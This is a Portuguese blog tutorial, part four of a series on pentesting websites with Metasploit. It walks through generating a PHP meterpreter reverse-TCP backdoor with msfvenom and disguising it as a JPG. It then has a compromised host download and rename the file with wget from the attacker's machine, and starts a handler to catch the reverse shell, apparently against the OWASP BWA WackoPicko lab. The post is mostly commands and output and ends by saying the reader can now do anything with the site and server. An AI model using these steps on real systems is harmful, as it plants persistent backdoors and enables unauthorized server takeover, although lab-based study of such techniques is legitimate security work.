Pentest em Sites com Metasploit Parte 4

Olá pessoal!

Depois de algum tempo voltei para finalizar essa série de posts. Estava meio ocupado e acabei deixando de lado este paper, mas vamos finalizar isso agora! Neste post vamos ver como criar um backdoor para facilitar o acesso a máquina comprometida com o msfvenom, presente no Metasploit.

Vamos usar o comando msfvenom para criar o backdoor:

root@bt:~# msfvenom
no options
Usage: /opt/metasploit/msf3/msfvenom [options] <var=val>

Options:
-p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all


-n, --nopsled [length] Prepend a nopsled of [length] size on to the payload
-f, --format [format] Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch [architecture] The architecture to use
--platform [platform] The platform of the payload
-s, --space [length] The maximum size of the resulting payload
-b, --bad-chars [list] The list of characters to avoid example: '\x00\xff'

-i, --iterations [count] The number of times to encode the payload

-c, --add-code [path] Specify an additional win32 shellcode file to include
-x, --template [path] Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --options List the payload's standard options
-h, --help Show this message

root@bt:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.77.137 LPORT=443 -f raw > /var/www/bd.php

root@bt:~# mv /var/www/bd.php /var/www/bd.jpg

Na máquina alvo, baixe o backdoor e renomeie para db.php:

os-shell> wget http://192.168.77.137/bd.jpg

do you want to retrieve the command standard output? [Y/n/a] Y command standard output:
---
--2012-08-26 23:47:21-- http://192.168.77.137/bd.php Connecting to 192.168.77.137:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [text/html]
Saving to: `bd.php'



0K 100% 2.04M=0s 2012-08-26 23:47:21 (2.04 MB/s) - `bd.php' saved [10/10]
---
os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a] y command standard output: '/owaspbwa/owaspbwa- svn/var/www/WackoPicko/users'
os-shell> mv bd.jpg bd.php
do you want to retrieve the command standard output? [Y/n/a] y
No output

Crie um handler e espere a conexão:

root@bt:~# msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.77.137 LPORT=443 E
[*] Please wait while we load the module tree...
IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|`.""'.
II 6. .P:.'/|`.: II 'T;. .;P' '.' / | `.'
II 'T;;P' `./ | .' IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]



+ -- --=[ 932 exploits - 499 auxiliary - 151 post + -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15753 updated 11 days ago (2012.08.16)
Warning: This copy of the Metasploit Framework was last updated 11 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
PAYLOAD => php/meterpreter/reverse_tcp LHOST => 192.168.77.137
LPORT => 443


[*] Started reverse handler on 192.168.77.137:443 [*] Starting the payload handler...

Rode o backdoor no browser e você receberá o Meterpreter no console:

E era isso! Agora você pode fazer o que quiser com o site e o server.

Tudo que foi mostrado nessa série de posts pertencem ao Sumedt Jitpukdebodin, conteúdo para propósitos de estudo, cuidado com o que você faz...